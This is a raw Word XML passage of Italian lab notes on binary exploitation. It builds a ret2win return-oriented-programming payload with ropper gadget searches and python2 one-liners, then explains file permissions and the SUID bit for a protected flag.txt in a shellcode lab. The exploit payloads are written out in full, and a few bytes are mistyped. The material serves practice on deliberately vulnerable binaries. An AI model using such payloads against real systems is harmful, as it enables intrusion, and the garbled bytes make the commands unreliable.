    <w:p w14:paraId="63745219" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Come sara il payload? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007E8611" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>padding + pop_rdi + param_1 + pop_rsi + param_2 + hacked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9ECC1" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="792C72E4" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>param_1: deadbeef -&gt; \xef\xbe\xad\xde -&gt; x2 essendo a 64 bit -&gt; \xef\xbe\xad\xde\xef\xbe\xad\xde</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394084CF" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B33D1B0" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 -c 'print "A" * 24 + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E003AA3" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"\xef\xbe\xad\xde\xef\xbe\xad\xde" + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D62FB2" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>"\x42\x11\x40\x00\x00\x00\x00\x00"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F08725" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="6E7D7B38" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">Come si vede abbiamo vari pop nell'offset e quindi dobbiamo trovare </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EECF8F2" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>un gadget che possa fare pop_rdi per passare deadbeef:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44174171" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="4B366A9C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ ropper --file ret2win_params --search "pop rdi"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A4C55B" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>&gt;&gt; 0x000000000040124b: pop rdi; ret;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2933F001" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>prendiamo l'indirizzo e reversiamolo per il payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488B15D4" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="1AD14597" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 -c 'print "A" * 24 + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69676C4C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="00562D9A" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"\x4b\x12\x40\x00\x00\x00\x00\x00" + </w:t>
      </w:r>
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>---&gt; pop_rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB29386" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="00562D9A" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"\xef\xbe\xad\xde\xef\xbe\xad\xde" +</w:t>
      </w:r>
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>---&gt; param_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D25572" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"\x42\x11\x40\x00\x00\x00\x00\x00"' </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>---&gt; hacked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6024C11E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D117968" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ ropper --file ret2win_params --search "pop rsi"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226B7EFF" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">&gt;&gt; 0x0000000000401249: pop rsi; pop r15; ret;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F3CBFD" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:lastRenderedPageBreak/>
        <w:t>prendiamo l'indirizzo e reversiamolo per il payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E56A18" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>\x40\x12\x49\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43241BF8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>Notiamo inoltre che non avviene solo una pop rsi, ma anche una pop r15,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B51DFAB" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>il nostro payload si modifica in quanto qualcosa andrà a finire dentro r15:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE9682" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="37E0EEF1" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>padding + pop_rdi + param_1 + pop_rsi + param_2 + junk + hacked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3B54D0" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E31916B" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 -c 'print "A" * 24 + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA49841" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="00562D9A" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"\x4b\x12\x40\x00\x00\x00\x00\x00" + </w:t>
      </w:r>
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>---&gt; pop_rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B71BC0B" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="00562D9A" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"\xef\xbe\xad\xde\xef\xbe\xad\xde" +</w:t>
      </w:r>
      <w:r w:rsidRPr="00562D9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>---&gt; param_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3547E84F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">"\x40\x12\x49\x00\x00\x00\x00\x00" + </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>---&gt; pop_rsi_r15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A7F146" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>"\xbe\xba\xde\xc0\xbe\xba\xde\xc0" +</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>---&gt; param_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDFC45A" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"\x00\x00\x00\x00\x00\x00\x00\x00" +    ---&gt; junk_param</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667C73D4" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"\x42\x11\x40\x00\x00\x00\x00\x00"' </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>---&gt; hacked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7482A0" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43C42292" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ python2 -c 'print "A" * 24 + "\x4b\x12\x40\x00\x00\x00\x00\x00" + </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566F0AD6" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">"\xef\xbe\xad\xde\xef\xbe\xad\xde" + "\x49\x12\x40\x00\x00\x00\x00\x00" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFF9EBD" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ "\xb\xba\xde\xc0\xbe\xba\xde\xc0" + "\x00\x00\x00\x00\x00\x00\x00\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7579A12F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ "\x42\x11\x40\x00\x00\x00\x00\x00"' &gt; payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481024E0" w14:textId="77777777" w:rsidR="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7401BE78" w14:textId="130F2BCD" w:rsidR="009D6CE9" w:rsidRPr="0070510D" w:rsidRDefault="009D6CE9" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>----&gt; SHELL 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5037C99A" w14:textId="24283A17" w:rsidR="0070510D" w:rsidRPr="009D6CE9" w:rsidRDefault="009D6CE9" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">./ret2win_params &lt; payload --&gt; </w:t>
      </w:r>
      <w:r w:rsidR="0070510D" w:rsidRPr="009D6CE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FATTO!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073E079E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="004214B5" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004214B5">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>05-injecting_custom_shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B6F6BC" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="004214B5" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66FD307A" w14:textId="2C4E919E" w:rsidR="004214B5" w:rsidRPr="004214B5" w:rsidRDefault="004214B5" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="004214B5">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=4zut2Mjgh5M</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13248F4C" w14:textId="60A2F77C" w:rsidR="0070510D" w:rsidRPr="004214B5" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="004214B5">
        <w:t xml:space="preserve">$ ls -lart --&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="004214B5">
        <w:tab/>
        <w:t xml:space="preserve">in questo modo possiamo visionare anche tutti </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9A19F7" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="004214B5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004214B5">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">i permessi e le cartelle </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE3243F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>In particolare, vediamo che flag.txt ha i seguenti permessi: -rw-------, ovvero solo il proprietario (root) ha il permesso di leggere e scrivere, mentre altri utenti non hanno alcun permesso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF2671F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="306AC8C2" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:lastRenderedPageBreak/>
        <w:t>$ cat flag.txt --&gt; conferma il fatto che flag è protetto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA492AC" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="3EEEB3E1" w14:textId="59F2D73E" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ sudo chown root:root flag.txt --&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667784B8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>utilizza sudo per elevare i privilegi e cambia l'owner e il gruppo di flag.txt a root:root. Questo è ridondante, poiché l'output del ls -lart mostra che flag.txt era già di proprietà di root. Il comando non cambia i permessi del file, ma cambia il proprietario (proprietario e gruppo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122B79B6" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="28E9000E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">$ sudo chmod 600 flag.txt --&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>permessi di tipo U-G-O (User, Group, Others)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB3D0C3" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>rwx | rwx | rwx --&gt; 111 | 111 | 111 --&gt; 777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C7ABE" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>se scrivo 600 corrisponde a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DDA3D0" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>6 = 110 | 0 = 000 | 0 = 000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E245C5" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>quindi: rw-------  il proprietario ha permesso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749B5CEC" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>di leggere e scrivere, mentre tutti gli altri</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0748B915" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>utenti non hanno alcun permesso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF10B1C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ sudo chown root:root server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3943F8A7" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ sudo chmod 4655 server --&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>Il numero 4655 rappresenta i permessi in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA70371" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t>formato ottale. Il 4 iniziale indica il bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453C1204" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SUID (Set User ID).</w:t>
      </w:r>
    </w:p>
